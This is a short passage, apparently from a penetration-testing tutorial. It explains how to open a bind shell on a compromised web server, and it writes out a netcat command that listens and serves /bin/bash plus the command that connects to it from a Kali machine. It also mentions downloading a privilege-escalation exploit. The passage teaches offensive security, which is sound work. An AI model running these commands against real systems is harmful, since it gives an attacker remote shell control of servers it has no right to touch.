Once we are able to upload and execute server-side code, there are a huge number of options we can use to compromise the server. For example, in a bind shell, we establish a direct connection that allows us to interact directly with the server without needing to go through the webshell. A very simple way to do this is to run the following in the server:

nc -lp 12345 -e /bin/bash

It will open the TCP port 12345 and listen for a connection. When the connection succeeds, it will execute /bin/bash, receive its input, and send its output through the network to the connected host (the attacking machine). To connect to the victim server, let's say 192.168.56.10, we run this command in our Kali machine:

nc 192.168.56.10 12345

This connects to the server listening on port 12345. It is also possible to make the server download a malicious program, a privilege escalation exploit, for example, and execute it to become a user with more privileges.